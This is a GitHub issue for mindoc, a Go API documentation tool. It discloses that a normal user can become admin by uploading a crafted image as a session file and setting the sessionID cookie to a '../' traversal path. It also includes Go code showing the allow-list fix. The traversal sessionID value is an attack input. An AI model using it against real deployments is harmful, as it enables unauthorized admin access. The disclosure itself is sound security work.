mindoc-org / mindoc

An online API documentation management system implemented in Golang, based on the beego framework
https://mindoc.com.cn/docs/mindochelp
Apache License 2.0
7.35k stars 1.91k forks

allow attacker unauthorized access to user account #384

Closed impakho closed 5 years ago

impakho commented 6 years ago

Target

mindoc <= v1.0.2

Description

Log in as a normal user and use the markdown editor to upload payload.jpg (exploit session file, log in as admin).

payload.jpg: (in hexdump)



It returns the uploaded file path: https://cdn.iminho.me/uploads/blog/201811/attach_15652cb8d168634f.jpg

Before modifying sessionID, you're logged in as test123 (normal account).


Modify sessionID to aa/../../../../../uploads/blog/201811/attach_15652cb8d168634f.jpg


After modifying sessionID, you're logged in as admin (super admin account).

Solution

Check sessionID; only allow [a-zA-Z0-9].

Reference

astaxie/beego#3383
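An added Go illustration of the fix described in the Solution, not code from mindoc or beego: the unchecked join of the cookie value onto the session directory sits beside a version that applies the [a-zA-Z0-9] allow-list, plus a second check that the resolved path stays inside the session directory. The function names, the save path and the sample cookie values are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"regexp"
	"strings"
)

// Allow-list from the issue's Solution: a session id is only [a-zA-Z0-9].
var sessionIDPattern = regexp.MustCompile(`^[a-zA-Z0-9]+$`)

// SessionFilePathUnchecked mirrors the weak behaviour: the cookie value is
// joined onto the session directory as-is, so "../" segments escape it.
func SessionFilePathUnchecked(savePath, sid string) string {
	return filepath.Join(savePath, sid)
}

// SessionFilePathChecked rejects any sid outside the allow-list before the
// filesystem is touched; a traversal string never reaches filepath.Join.
func SessionFilePathChecked(savePath, sid string) (string, error) {
	if !sessionIDPattern.MatchString(sid) {
		return "", errors.New("invalid session id")
	}
	return filepath.Join(savePath, sid), nil
}

// EscapesDir is a defence-in-depth check: it reports whether the resolved
// path p lies outside dir, independent of how p was built.
func EscapesDir(dir, p string) bool {
	rel, err := filepath.Rel(filepath.Clean(dir), filepath.Clean(p))
	if err != nil {
		return true
	}
	return rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator))
}

func main() {
	const savePath = "/tmp/mindoc_sessions" // assumed session directory
	// Constructed sample cookie values: a normal id and the traversal shape
	// from the report, which points at a user-uploaded file.
	for _, sid := range []string{"aB3xYz09", "aa/../../../../../uploads/blog/201811/attach_15652cb8d168634f.jpg"} {
		p := SessionFilePathUnchecked(savePath, sid)
		fmt.Printf("unchecked: %q -> %s (escapes dir: %v)\n", sid, p, EscapesDir(savePath, p))
		if _, err := SessionFilePathChecked(savePath, sid); err != nil {
			fmt.Printf("checked:   %q rejected: %v\n", sid, err)
		} else {
			fmt.Printf("checked:   %q accepted\n", sid)
		}
	}
}
```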

LockGit commented 6 years ago

nice